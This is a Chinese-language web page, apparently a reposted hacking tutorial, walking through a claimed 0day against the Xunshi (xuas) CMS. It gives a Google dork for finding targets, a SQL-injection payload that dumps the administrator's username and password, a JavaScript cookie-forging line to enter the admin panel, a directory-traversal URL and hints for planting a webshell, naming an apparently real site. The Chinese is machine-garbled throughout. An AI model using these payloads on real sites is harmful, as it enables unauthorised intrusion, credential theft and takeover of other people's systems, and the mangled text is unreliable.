[讯时体系(xuas)最新通杀马脚0day图文解释] 讯时

来源:建站 发布时间:2018-09-19 04:39:57 点击:

谷歌关键字:inurl:news_more.asp?lm2= (关键字很多的本身定义吧)

1、/admin/admin_news_pl_view.asp?id=1

//id随便任性 填入以下语句

2、有时1显示缺点信息的时辰持续往撤退撤退2,3,4,我退到11才找到了页面,愁闷!

讯时体系(xuas)最新通杀马脚0day图文解释1

3、|"+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username="

讯时体系(xuas)最新通杀马脚0day图文解释2

爆出管理员帐号和暗码了

讯时体系(xuas)最新通杀马脚0day图文解释3

4、cookies进后台

javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

讯时体系(xuas)最新通杀马脚0day图文解释4

5、后台用了cookie验证,直接拜访http://www.dxggw.cn/admin/admin_index.asp就OK了!

讯时体系(xuas)最新通杀马脚0day图文解释5

6、后台有上传和备份取SHELL不难。

7、讯时还有个列目次马脚:http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..

逍遥复仇:我弄了一个讯时cms4.1版本的没稀有据库备份不知道怎样弄SHELL,有的说固然后台显示但备份页面是存在的,登录后台后拜访 http://www.xx.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,愁闷着呢,谁还有其他办法供给一下,感谢!

推荐拜访:马脚 通杀 图文 讯时体系(xuas)最新通杀马脚0day图文解释 0day马脚发掘 0day马脚检测对象
上一篇:win10怎样重装体系【win体系自带不起眼但又很强的杀毒对象】
下一篇:最后一页

Copyright @ 2013 - 2018 易啊教导网_收费进修教导网_自学.励志.生长! All Rights Reserved

易啊教导网_收费进修教导网_自学.励志.生长! 版权一切 湘ICP备11019447号-75